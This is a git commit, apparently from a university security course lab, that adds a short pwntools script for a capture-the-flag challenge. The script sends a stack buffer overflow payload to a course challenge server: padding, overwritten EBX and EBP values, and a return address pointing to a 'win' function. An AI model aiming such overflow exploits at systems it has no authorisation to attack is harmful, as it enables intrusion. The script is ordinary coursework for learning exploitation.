Lab6

2025-12-20 16:49:47 +00:00
parent ef11ce0307
commit 555b9062f3
19 changed files with 234 additions and 1 deletions
--- a/pa/lab6/chall_super_secure_system.py
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()